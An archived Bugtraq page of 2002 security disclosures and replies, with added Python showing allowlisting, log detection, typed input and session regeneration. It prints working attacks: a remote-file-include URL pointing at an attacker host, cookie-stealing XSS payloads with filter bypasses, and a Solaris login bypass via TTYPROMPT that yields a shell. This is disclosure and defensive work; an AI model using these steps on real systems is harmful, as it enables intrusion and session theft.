phpMyNewsletter

2002-10-03 Thread Frog Man

Information:
°°
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
°°
 /include/customize.php 


Exploit :
°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :


or
http://[target]/include/customize.php?l=../path/file/to/view


Patch :
°°°
The author has been alerted and the latest version (0.7beta1) has been patched.


More details
- in french :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n
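Both request shapes in the advisory (a remote URL and a `../` path in the `l` parameter) are stopped by the same control: treat the parameter as a key into a fixed set of language files, never as a path. The Python below is an added example, not phpMyNewsletter's code (which is PHP and not reproduced on this page); the directory `/var/www/newsletter/lang`, the `xx.php` file naming, the function names and the access-log lines are all constructed for illustration. The second half is a detection check that flags the two request shapes in an Apache-style log.

```python
import re
from pathlib import Path

# Assumed location of the per-language template files (not from the advisory).
LANG_DIR = Path("/var/www/newsletter/lang")

# A language code is two lowercase letters, optionally followed by _ and a
# two-letter region, e.g. "en" or "pt_BR".  Nothing else is a valid key.
LANG_RE = re.compile(r"[a-z]{2}(?:_[A-Z]{2})?")


def resolve_language_file(lang: str, base: Path = LANG_DIR) -> Path:
    """Map the untrusted 'l' query parameter onto a file inside `base`.

    The allowlist regex alone already rejects "http://attacker/code.txt" and
    "../path/file/to/view"; the containment check after it is defence in
    depth so that a later loosening of the regex cannot reopen traversal.
    """
    if not LANG_RE.fullmatch(lang):
        raise ValueError(f"invalid language code: {lang!r}")
    base = base.resolve()
    candidate = (base / f"{lang}.php").resolve()
    if candidate.parent != base:
        raise ValueError("resolved path escapes the language directory")
    return candidate


def safe_language_param(lang: str, base: Path = LANG_DIR):
    """Return the resolved file for a valid parameter, or None if rejected."""
    try:
        return resolve_language_file(lang, base)
    except ValueError:
        return None


# Detection side: the include parameter should never carry a URL scheme or a
# parent-directory step.  Matches literal and %2e%2e / %2f encodings.
RFI_PATTERN = re.compile(
    r"customize\.php\?[^\s\"]*\bl="
    r"(?:[a-z][a-z0-9+.\-]*(?::|%3a)(?:/|%2f){2}"      # scheme://
    r"|(?:\.\.|%2e%2e)(?:/|\\|%2f|%5c))",              # ../ or ..\
    re.IGNORECASE,
)


def flag_include_attempts(log_lines):
    """Return the access-log lines whose 'l' parameter looks like an include attack."""
    return [line for line in log_lines if RFI_PATTERN.search(line)]


# Constructed Apache-style access log lines for the demonstration.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Oct/2002:10:01:02 +0000] "GET /include/customize.php?l=fr&text=Hello HTTP/1.0" 200 512',
    '10.0.0.9 - - [03/Oct/2002:10:01:07 +0000] "GET /include/customize.php?l=http://203.0.113.7/code.txt&text=Hello%20World HTTP/1.0" 200 88',
    '10.0.0.9 - - [03/Oct/2002:10:01:11 +0000] "GET /include/customize.php?l=../../etc/passwd HTTP/1.0" 200 1420',
    '10.0.0.9 - - [03/Oct/2002:10:01:15 +0000] "GET /include/customize.php?l=..%2f..%2fconfig.php HTTP/1.0" 200 900',
]


if __name__ == "__main__":
    for value in ("fr", "http://203.0.113.7/code.txt", "../path/file/to/view"):
        print(f"{value!r:40} -> {safe_language_param(value)}")
    for line in flag_include_attempts(SAMPLE_LOG):
        print("FLAG:", line)
```

The allowlist is the real fix; the `resolve()` containment check costs nothing and catches a future regex mistake, and the log pattern gives a quick retrospective check of whether the parameter was ever probed.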






The Books Module for the PostNuke CMS XSS Vulnerability

2002-10-03 Thread Pistone

Class: Input Validation Error

Risk: Due to the simplicity of the attack and the number of sites
that run the Books module, the risk is classified as Medium to High.

URL: Http://pn-mod-books.sourceforge.net
This Books module version v0.54 is running as a Mutant (PN 0.64)
This Books module version v0.6  is running as a Rogue (PN 0.7)

Exploit:
   
http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|

Replace each "|" with "<" or ">" as appropriate.


The programmer of the Books module receives a copy of this report.


Salu2

Pistone
--
Http://www.gauchohack.com.ar
Http://www.hackindex.org




iDEFENSE Security Advisory 10.03.2002: Apache 1.3.x shared memory scoreboard vulnerabilities

2002-10-03 Thread David Endler

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

iDEFENSE Security Advisory 10.03.2002
Apache 1.3.x shared memory scoreboard vulnerabilities

16:00 GMT, October 3, 2002


I. BACKGROUND

The Apache Software Foundation's HTTP Server is an effort to develop
and maintain an open-source HTTP server for modern operating systems
including Unix and Windows NT. The goal of this project is to provide
a secure, efficient and extensible server that provides HTTP services
in sync with the current HTTP standards.  More details about it are
available at http://httpd.apache.org .

II. DESCRIPTION

Apache HTTP Server contains a vulnerability in its shared memory
scoreboard. Attackers who can execute commands under the Apache UID
can either send a (SIGUSR1) signal to any process as root, in most
cases killing the process, or launch a local denial of service (DoS)
attack.

III. ANALYSIS

Exploitation requires execute permission under the Apache UID. This
can be obtained by any local user with a legitimate Apache scripting
resource (ie: PHP, Perl), exploiting a vulnerability in web-based
applications written in the above example languages, or through the
use of some other local/remote Apache exploit.

Once such a status is attained, the attacker can then attach to the
httpd daemon's 'scoreboard', which is stored in a shared memory
segment owned by Apache. The attacker can then cause a DoS condition
on the system by continuously filling the table with null values and
causing the server to spawn new children. 

The attacker also has the ability to send any process a SIGUSR1
signal as root. This is accomplished by continuously overwriting the
parent[].pid and parent[].last_rtime segments within the scoreboard
to the pid of the target process and a time in the past. When the
target pid receives the signal SIGUSR1, it will react according to
how it is designed to manage the signal. According to the man page
(man 7 signal), if the signal is un-handled then the default action
is to terminate:

 ...
 SIGUSR1 30,10,16 A User-defined signal 1
 ...
 The letters in the "Action" column have the following meanings:

 A Default action is to terminate the process.
 ...

iDEFENSE successfully terminated arbitrary processes, including those
that "kicked" people off the system.

IV. DETECTION

Apache HTTP Server 1.3.x, running on all applicable Unix platforms,
is affected.

V. VENDOR FIX/RESPONSE

Apache HTTP Server 1.3.27 fixes this problem. It should be available
on October 3 at http://www.apache.org/dist/httpd/ . 

VI. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification number CAN-2002-0839 to this issue.

VII. DISCLOSURE TIMELINE

8/27/2002   Issue disclosed to iDEFENSE
9/18/2002   Vendor notified at [EMAIL PROTECTED]
9/18/2002   iDEFENSE clients notified
9/19/2002   Response received from Mark J Cox ([EMAIL PROTECTED])
10/3/2002   Coordinated public disclosure

VIII. CREDIT

zen-parse ([EMAIL PROTECTED]) disclosed this issue to iDEFENSE.


Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to [EMAIL PROTECTED], subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. iALERT, our security intelligence service,
provides decision-makers, frontline security professionals and
network administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


-dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

[EMAIL PROTECTED]
www.idefense.com

-BEGIN PGP SIGNATURE-
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPZx0I0rdNYRLCswqEQIowQCfQT+FYR1FLTEzlf49SpJXwDnie8wAn3Kr
CncduGV6EYHqVayQE90b7Yij
=4T8j
-END PGP SIGNATURE-




Re: Postnuke XSS fixed

2002-10-03 Thread Muhammad Faisal Rauf Danka

I just checked it again :

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);

where + denotes a blank space or similarly this one:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);

resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg.

However the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);

or any character inserted before first "script" and after first less than "<" 
resulting in DB Error, revealing nothing (user/pass/path etc).

But I used I.E and Netscape, maybe it's different with other browsers. :)

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202


--- Daniel Woods <[EMAIL PROTECTED]> wrote:
>
>Humm!
>
>> on 26th Sep the following url:
>> http://news.postnuke.com/modules.php
>>  
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work Keep it up! :)
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
>  http://news.postnuke.com/modules.php
> 
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>
>Using the request...
> 
>?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);
>gives me the DB Error: message
>
>And using the request...
> 
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.
>
>Thanks... Dan.

_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---

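The thread shows the shape of the problem: the check behind "Sorry - $HTTP_GET_VARS contains javascript" is a keyword blocklist, and a backslash, a blank or another character inside the tag slips past it while the value still reaches the SQL query (hence the DB Error). The Python below is an added example, not PostNuke's code: `BLOCKLIST` is a constructed model of such a check, and the two bypass strings are the ones the thread describes (the blank variant reconstructed from Dan's note that '+' is treated as a space). It contrasts the blocklist with the two controls that actually close the hole: typing `sid` as an integer before it touches SQL, and HTML-escaping anything reflected into a page.

```python
import html
import re

# Constructed model of a keyword blocklist of the kind that answers
# "Sorry - $HTTP_GET_VARS contains javascript".  Not PostNuke's real code.
BLOCKLIST = re.compile(r"<script|javascript:", re.IGNORECASE)


def blocklist_rejects(value: str) -> bool:
    """True if the naive filter would reject the parameter."""
    return BLOCKLIST.search(value) is not None


def parse_sid(value: str) -> int:
    """Positive validation: an article id is a small non-negative integer.

    Anything else is rejected before it can reach the SQL statement, which
    removes the injection surface and the reflected-XSS surface at once.
    """
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("sid must be a non-negative integer")
    return int(value)


def render_not_found(raw_sid: str) -> str:
    """If the raw value must be shown back to the user, escape it for HTML."""
    return "<p>No such article: " + html.escape(raw_sid, quote=True) + "</p>"


def handle_request(sid_param: str) -> str:
    """Outcome for one value of the `sid` query parameter."""
    try:
        sid = parse_sid(sid_param)
    except ValueError:
        return render_not_found(sid_param)
    # Parameterised query: the integer can never alter the statement text.
    query, params = "SELECT title FROM nuke_stories WHERE sid = %s", (sid,)
    return f"query {query!r} with {params}"


# Inputs from the thread (constructed here; the archive stripped the tags).
PLAIN = "<script>alert(document.cookie);</script>"
BACKSLASH_VARIANT = "<\\script>alert(document.cookie);"
SPACE_VARIANT = "< script>alert(document.cookie);"   # '+' decoded to a blank


def filter_report():
    """For each input: (blocklist rejected it?, typed check accepted it?)."""
    rows = {}
    for name, value in (("plain", PLAIN), ("backslash", BACKSLASH_VARIANT),
                        ("space", SPACE_VARIANT), ("valid", "1234")):
        typed_ok = True
        try:
            parse_sid(value)
        except ValueError:
            typed_ok = False
        rows[name] = (blocklist_rejects(value), typed_ok)
    return rows


if __name__ == "__main__":
    for name, (rejected, typed_ok) in filter_report().items():
        print(f"{name:10} blocklist_rejects={rejected!s:5} parse_sid_accepts={typed_ok}")
    print(handle_request(PLAIN))
```

The report makes the asymmetry visible: the blocklist stops only the textbook string, while the typed check stops every variant and accepts only a real article id, so no further blocklist maintenance is needed.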



Re: iDEFENSE Security Advisory 10.02.2002: Net-SNMP DoSVulnerability

2002-10-03 Thread Wes Hardaker

> On Wed, 2 Oct 2002 16:14:45 -0400, "David Endler" <[EMAIL PROTECTED]> said:

David> This issue potentially affects any Net-SNMP installation in
David> which the "public" read-only community string has not been
David> changed.

net-snmp does not release packages with a pre-configured public
community string.  Various vendors (RedHat, etc) however, do.  You'd
have to have intentionally granted public access for it to affect you
if you're using net-snmp.

-- 
"The trouble with having an open mind, of course, is that people will
 insist on coming along and trying to put things in it."   -- Terry Pratchett



Re: Postnuke XSS issues [correction]

2002-10-03 Thread Brian E

In-Reply-To: <[EMAIL PROTECTED]>

>As it turns out the Postnuke issue in particular is a red herring.
>
>As the lead developer describes it -- the cookie generated is a local
>site cookie that is sandboxed within the confines of the
>browser/session.
>
>It is not the remote user's cookie.

The correction posted here on BugTraq is false.  The vulnerability exists 
with PostNuke .72.  I expect this exists for previous versions as well but 
have not tested. 

I have used the sample exploit URL against my own PN .72 system. 

1.  Close all instances of IE. 
2.  Use the url against my site.  The session ID is displayed in the popup 
(the script is embedded in the HTML source). 
3.  View my site database in MySQL.  NUKE_SESSION_INFO table contains an 
active session ID (pn_sessid field).  No user is associated with this 
session ID (i.e. pn_uid=0). 
4.  Logon to my site.  Provide a userid and password.
5.  View my site database in MySQL.  NUKE_SESSION_INFO table contains an 
active session ID (as displayed in #3).  The userid I used to logon to my 
site (from #4) is now associated with this session ID. 
6.  Use the url against my site.  The session ID is displayed in the popup 
(the script is embedded in the HTML source).  This is the same session ID 
displayed in #1 and represents the authentication token for the user (user 
account used in #4).  An attacker who successfully obtains this 
information could hijack the valid session and assume the identity and 
privileges of the user from #4. 

This process has been simplified and does not reflect multiple instances 
of IE (which could have unique or shared session IDs). 

Yes, PN may use a sandbox environment if the user has not logged into the 
site yet.  However, if the user logs on before or after this vulnerability 
is exploited it becomes more serious. 

1.  If an attacker obtains (and exploits) a valid session ID of a regular 
user, the damage caused to the site would likely be minimal.  
However, the user may experience embarrassment or some loss of reputation 
as someone could have impersonated them and posted comments as the user. 
2.  If an attacker obtains (and exploits) a valid session ID of a 
postnuke moderator or other privileged user (i.e. postnuke admin), the 
damage caused to the site would be greater than #1.  This user may be able 
to alter the configuration of the postnuke application or affect data that 
appears on the site to other users.  This would not allow direct access to 
the MySQL database or file system.  Damage to user is same as #1. 

A postnuke admin can protect the site by timing out session IDs when no 
longer in use. 

A user can protect themselves by logging out of the application rather 
than just closing the browser. 

I would also argue that if a user's actions are not monitored, they will 
go undetected.  Will a driver run through a red light if they are stopped 
on a deserted road with no one around?  What about if that driver sees 
they are being watched by a camera?  Yes, the web server may be logging 
requests but these records do not easily or directly show what action a 
particular user performed.  In my opinion, individual user accountability 
in PostNuke is not achieved.  Knowing that actions may go undetected, a 
user may be further tempted to try exploiting vulnerabilities. 


Regards, 
Brian, CISSP 
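The walk-through above shows an anonymous session id (pn_uid=0) becoming the authenticated token at login, and the two mitigations offered are idle timeouts on the server and an explicit logout by the user. The Python below is an added example, not PostNuke's code: a small session store that implements both, and in addition issues a fresh id at login so that an id captured while the session was still anonymous is worthless afterwards (that third control goes beyond what the post proposes). `SessionStore`, `FakeClock` and the helper functions are names invented here; the injectable clock exists only so the timeout can be demonstrated without waiting.

```python
import secrets
import time


class FakeClock:
    """Deterministic clock so the idle timeout can be shown without waiting."""

    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class SessionStore:
    """In-memory session table with: an idle timeout, a logout that really
    invalidates the record, and a fresh session id at login (so an id seen
    while the session was anonymous, pn_uid = 0, stops working)."""

    def __init__(self, idle_timeout=900, clock=time.time):
        self.idle_timeout = idle_timeout
        self.clock = clock
        self._sessions = {}  # sid -> {"uid": int, "last_seen": float}

    def create(self):
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"uid": 0, "last_seen": self.clock()}
        return sid

    def lookup(self, sid):
        """Return the record, or None if the id is unknown or idle too long."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if self.clock() - rec["last_seen"] > self.idle_timeout:
            del self._sessions[sid]  # expire lazily on access
            return None
        rec["last_seen"] = self.clock()
        return rec

    def login(self, sid, uid):
        """Bind uid to a *new* id; the pre-login id stops working."""
        if self.lookup(sid) is None:
            raise KeyError("unknown or expired session")
        del self._sessions[sid]
        new_sid = self.create()
        self._sessions[new_sid]["uid"] = uid
        return new_sid

    def logout(self, sid):
        self._sessions.pop(sid, None)

    def sweep(self):
        """Drop every idle session (for a periodic job); returns the count."""
        now = self.clock()
        stale = [s for s, r in self._sessions.items()
                 if now - r["last_seen"] > self.idle_timeout]
        for s in stale:
            del self._sessions[s]
        return len(stale)


def walkthrough():
    """Replay the post's steps against the store and report what each sees."""
    clock = FakeClock()
    store = SessionStore(idle_timeout=900, clock=clock)
    anon = store.create()                                 # anonymous, uid 0
    pre_login_uid = store.lookup(anon)["uid"]
    authed = store.login(anon, uid=42)                    # login: id regenerated
    old_id_still_valid = store.lookup(anon) is not None   # the captured id
    post_login_uid = store.lookup(authed)["uid"]
    clock.advance(901)                                    # idle past the timeout
    valid_after_idle = store.lookup(authed) is not None
    return {
        "ids_differ": anon != authed,
        "pre_login_uid": pre_login_uid,
        "old_id_still_valid": old_id_still_valid,
        "post_login_uid": post_login_uid,
        "valid_after_idle": valid_after_idle,
    }


def logout_invalidates():
    """Logging out removes the server-side record, unlike closing the browser."""
    store = SessionStore(clock=FakeClock())
    sid = store.login(store.create(), uid=7)
    store.logout(sid)
    return store.lookup(sid) is None


if __name__ == "__main__":
    print(walkthrough())
    print("logout invalidates:", logout_invalidates())
```

Regenerating the id at login is the control that breaks the post's scenario outright: the id displayed before login is never the one that carries the user's privileges, so timeouts and logout become the second and third line rather than the only ones.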



Re: Solaris 2.6, 7, 8

2002-10-03 Thread Gert-Jan Hagenaars

Apparently, Dave Ahmad wrote:
% 
% These may be fixes for this vulnerability, however they apply to telnetd
% and this vulnerability has to be in login.

So it makes more sense to apply the right patches to login, and not
patches to telnetd.  If you only want to install the necessary patches
to plug this specific hole, very quickly, use these:

solaris 8 login fix: 111085-02
solaris 7 login fix: 112300-01
solaris 2.6 login fix: 105665-04
solaris 2.5.1 login fix: 106160-02

use patchadd.  A reboot is not necessary.

During your normal maintenance window you should install the rest of the
recommended patches.

Cheers,
Gert-Jan.

-- 
+  + --- ++ - +0+ + ++ +++ +  +
sed '/^[when][coders]/!d G.J.W. Hagenaars -- gj at hagenaars dot com
/^...[discover].$/d  Remembering Mike Carty 1968-1994
   /^..[real].[code]$/!d UltrixIrixAIXHPUXSunOSLinuxBSD, nothing but nix
' /usr/dict/wordsI'm Dutch, what's _your_ excuse?



Re: [VulnDiscuss] XSS bug in Compaq Insight Manager Http server

2002-10-03 Thread sullo

It may be worth noting that the 2.0 and 2.1 releases are also
vulnerable, however 1.0 does not seem to be (getting worse, as 4.x
introduces a drop-down list of user names to choose from as well). 
Also, it runs on some systems on port 49400 and https on 2381 (as well
as the 2301 mentioned below).

As for a "3rd party software tool" flagging all web servers as
vulnerable, well... I can only answer for Nikto, but yes indeed it will
report a vulnerable system as vulnerable, as it does with the Compaq
server. Exploiting for "value" is another discussion entirely, but I do
get a nice popup by injecting javascript.

-Sullo

Taylor Huff wrote:
> Advisory name: XSS bug in Compaq Insight Manager Http server
> Application: Compaq Insight Manager Http server
> Date: 01.10.2002
> Impact: XSS code execution
> 
> [DESCRIPTION]
> XSS bug in Compaq Insight Manager Http server
> 
> [ISSUE]
> The Compaq Insight Manager Http server is vulnerable to the Cross Site 
> Scripting (XSS) vulnerability.  This vulnerability is caused by the 
> results returned to a user when a non-existing file is requested.  The 
> vulnerability would allow an attacker to make the server present another 
> user with malicious JavaScript/HTML code that is interpreted and 
> executed without the users knowledge (e.g. the result contains the 
> JavaScript provided in the request).  This vulnerability was identified 
> with a popular open-source vulnerability assessment tool and confirmed 
> using the following XSS test.
> 
> [XSS TEST]
> http://:2301/alert('Test')
> 
> [VERSIONS TESTED]
> CompaqHTTPServer/4.2
> CompaqHTTPServer/4.37
> 
> [SUPPORTING INFO]
> http://www.cert.org/advisories/CA-2000-02.html
> 
> [VENDOR RESPONSE]
> There is a 3rd party software tool that can be used for security 
> assessments that flags any web server as potentially having this 
> problem. Our web servers do not, to our knowledge, have this 
> vulnerability. We have investigated it but it is a non-issue for us. 
> This issue is just a 'potential vulnerability' rather than a 'for sure' 
> problem. In other words, the tool is guessing that all web servers can 
> have this problem.
> 
> Thank You,
> HP E-Services


___
http://www.cirt.net/
Home of Nikto



Re: Kondara MNU/Linux

2002-10-03 Thread Shin SHIRAHATA

Hi.

On June 28th, DigitalFactory divested part of its Linux business,
and SP, Inc. is now selling Kondara MNU/Linux.

Press release from DigitalFactory (Japanese Language Only):
http://www.digitalfactory.co.jp/news/press/020628.html

After that, the Kondara Project, which was the development project of
Kondara MNU/Linux, was wound up, and Kondara.org's server has been
shut down since July 15th.

P.S.
Some people from the Kondara Project have launched a new project called
Momonga Linux. This project has no relationship with Kondara.
Momonga Linux is still under development.
For more details, please visit http://www.momonga-linux.org/

> Kondara MNU/Linux's primary web/ftp sites have been down for over a month
> now. Can anyone confirm that the company is still in operation, I have had
> no luck in contacting them. They still appear to sell several of their
> products via DigitalFactory, but they do not appear to be supported any
> longer (i.e. no security updates in a month+).

---
Shin SHIRAHATA <[EMAIL PROTECTED]>
KEIO University / WIDE Project





Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan

Another thing,  if you tcpwrap your telnet sessions, you can prevent
localhost telnets.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

-
I have not failed.  I have just
found 10,000 ways that don't work.
- Thomas Edison
-

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: [EMAIL PROTECTED]
>
>




Re: [VulnWatch] Notes on the SQL Cumulative patch

2002-10-03 Thread Dave Aitel

People in Immunity's Vulnerability Disclosure Club or people who have
purchased CORE Impact or people who have written their own SQL Server
Hello exploit can verify that this statement from the Microsoft Advisory
is, in fact, completely untrue.

The default install, in fact, every install I've run into, gives you
LOCAL/SYSTEM. LOCAL/SYSTEM usually has significant privileges. 

Dave Aitel
Immunity, Inc.

"Unchecked buffer in SQL Server 2000 authentication function
(CAN-2002-1123):

What’s the scope of this vulnerability?

This is a buffer overrun vulnerability. By sending a specially malformed
login request to an affected server, an attacker could either cause the
SQL Server service to fail or gain control over the database. It would
not be necessary for the user to successfully authenticate to the server
in order to exploit the vulnerability.

This vulnerability only affects SQL Server 2000 and MSDE 2000. Although
the vulnerability would provide a way to gain control over the database,
it would not, under default conditions, grant the attacker significant
privileges at the operating system level. "

On Thu, 2002-10-03 at 10:56, David Litchfield wrote:
> The cumulative patch at
> http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-056.asp
> addresses 4 vulnerabilities in SQL Server 7 and 2000. Dave
> Aitel's (www.immunitysec.com) "hello" bug (unauthenticated  buffer overflow
> during authentication) is patched here.
> 
> Also addressed is the file overwrite vulnerability discussed here
> http://www.nextgenss.com/advisories/mssql-jobs2.txt
> 
> The Microsoft advisory states that "operating system" commands can be
> inserted into files - the implication being that batch files can be dropped
> into startup folders. This is not true for SQL Server 2000. The text of the
> file created is UNICODE, i.e. each character taking two bytes with the
> second byte being a NULL. This NULL prevents OS commands from being
> executed. The risk posed to SQL Server 2000 systems then is file overwrite
> such as ntoskrnl.exe
> 
> Please note that I have not tested this on SQL Server 7 and what MS says may
> be true about being able to run OS commands on this version - I have a
> feeling it is not, though.
> 
> It is important that the patch be installed as soon as is possible to fix
> Dave Aitel's issue but for the file overwrite issue drop public access from
> the relevant stored procedures in the interim as a workaround:
> 
> revoke execute on sp_add_job from public
> revoke execute on sp_add_jobstep from public
> revoke execute on sp_add_jobserver from public
> revoke execute on sp_start_job from public
> 
> Cheers,
> David Litchfield
> A check for these issues already exists in NGSSQuirreL
> (http://www.nextgenss.com/software/ngssquirrel.html ) and an update is being
> made now to cover the other two issues.
> 
> 






Re: Solaris 2.6, 7, 8

2002-10-03 Thread Marco Ivaldi

On Wed, 2 Oct 2002, buzheng wrote:

> I do not think this is a new bug.

I completely agree.

> But, the remote setting of TTYPROMPT does matter. you can not succeed in
> login without remotely changing the TTYPROMPT. This is also the bug
> mentioned in Jonathan's original letter (bid:5531).

That's why this bug is not exploitable using remote applications like
rlogin, ssh (at least if you are not crazy enough to enable the UseLogin
option) or X.25 pad: rlogin and pad aren't able to pass env vars other
than TERM, while ssh normally doesn't use /bin/login for user authentication.

> If you have applied patches for these 2 bugs, you are safe now.
>
> BTW: you can change multiple "c "s to "a=b"s, actually, since SYS V
> login treat " " as environ var separator, you can also use >=64 words
> separated by " " or "\t". they will all work.

Agreed as well.

:raptor
Antifork Research, Inc. ITBH Italian Black Hats
http://www.0xdeadbeef.eu.org
http://elite.blackhats.it





Notes on the SQL Cumulative patch

2002-10-03 Thread David Litchfield

The cumulative patch at
http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-056.asp
addresses 4 vulnerabilities in SQL Server 7 and 2000. Dave
Aitel's (www.immunitysec.com) "hello" bug (unauthenticated  buffer overflow
during authentication) is patched here.

Also addressed is the file overwrite vulnerability discussed here
http://www.nextgenss.com/advisories/mssql-jobs2.txt

The Microsoft advisory states that "operating system" commands can be
inserted into files - the implication being that batch files can be dropped
into startup folders. This is not true for SQL Server 2000. The text of the
file created is UNICODE, i.e. each character taking two bytes with the
second byte being a NULL. This NULL prevents OS commands from being
executed. The risk posed to SQL Server 2000 systems then is file overwrite
such as ntoskrnl.exe

Please note that I have not tested this on SQL Server 7 and what MS says may
be true about being able to run OS commands on this version - I have a
feeling it is not, though.

It is important that the patch be installed as soon as is possible to fix
Dave Aitel's issue but for the file overwrite issue drop public access from
the relevant stored procedures in the interim as a workaround:

revoke execute on sp_add_job from public
revoke execute on sp_add_jobstep from public
revoke execute on sp_add_jobserver from public
revoke execute on sp_start_job from public

Cheers,
David Litchfield
A check for these issues already exists in NGSSQuirreL
(http://www.nextgenss.com/software/ngssquirrel.html ) and an update is being
made now to cover the other two issues.




[ESA-20021003-023] fetchmail-ssl: buffer overflows and broken boundarychecks.

2002-10-03 Thread EnGarde Secure Linux

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


++
| EnGarde Secure Linux Security AdvisoryOctober 03, 2002 |
| http://www.engardelinux.org/  ESA-20021003-023 |
||
| Package: fetchmail-ssl |
| Summary: buffer overflows and broken boundary checks.  |
++

  EnGarde Secure Linux is a secure distribution of Linux that features
  improved access control, host and network intrusion detection, Web
  based secure remote management, complete e-commerce using AllCommerce,
  and integrated open source security tools.

OVERVIEW
--------
  There are several buffer overflows and broken boundary checks in
  fetchmail.  This update brings fetchmail up to version 6.1.0, fixing
  all known issues.

SOLUTION
--------
  Users of the EnGarde Professional edition can use the Guardian Digital
  Secure Network to update their systems automatically.

  EnGarde Community users should upgrade to the most recent version
  as outlined in this advisory.  Updates may be obtained from:

ftp://ftp.engardelinux.org/pub/engarde/stable/updates/
http://ftp.engardelinux.org/pub/engarde/stable/updates/

  Before upgrading the package, the machine must either:

a) be booted into a "standard" kernel; or
b) have LIDS disabled.

  To disable LIDS, execute the command:

# /sbin/lidsadm -S -- -LIDS_GLOBAL

  To install the updated package, execute the command:

# rpm -Uvh files

  You must now update the LIDS configuration by executing the command:

# /usr/sbin/config_lids.pl

  To re-enable LIDS (if it was disabled), execute the command:

# /sbin/lidsadm -S -- +LIDS_GLOBAL

  To verify the signatures of the updated packages, execute the command:

# rpm -Kv files

UPDATED PACKAGES
----------------
  These updated packages are for EnGarde Secure Linux Community
  Edition.

  Source Packages:

SRPMS/fetchmail-ssl-6.1.0-1.0.5.src.rpm
  MD5 Sum: ce52261f9c91b7346cd588a38c86011b

  Binary Packages:

i386/fetchmail-ssl-6.1.0-1.0.5.i386.rpm
  MD5 Sum: 74a23fe3975b6d23ac45fcc865ac

i686/fetchmail-ssl-6.1.0-1.0.5.i686.rpm
  MD5 Sum: f7ac0b8560086169ba39e77c3aeddfcd

REFERENCES
----------
  Guardian Digital's public key:
http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY

  fetchmail's Official Web Site:
http://www.tuxedo.org/~esr/fetchmail/

  Security Contact:   [EMAIL PROTECTED]
  EnGarde Advisories: http://www.engardelinux.org/advisories.html

------------------------------------------------------------------------
$Id: ESA-20021003-023-fetchmail-ssl,v 1.2 2002/10/03 12:37:03 rwm Exp $
------------------------------------------------------------------------
Author: Ryan W. Maple <[EMAIL PROTECTED]> 
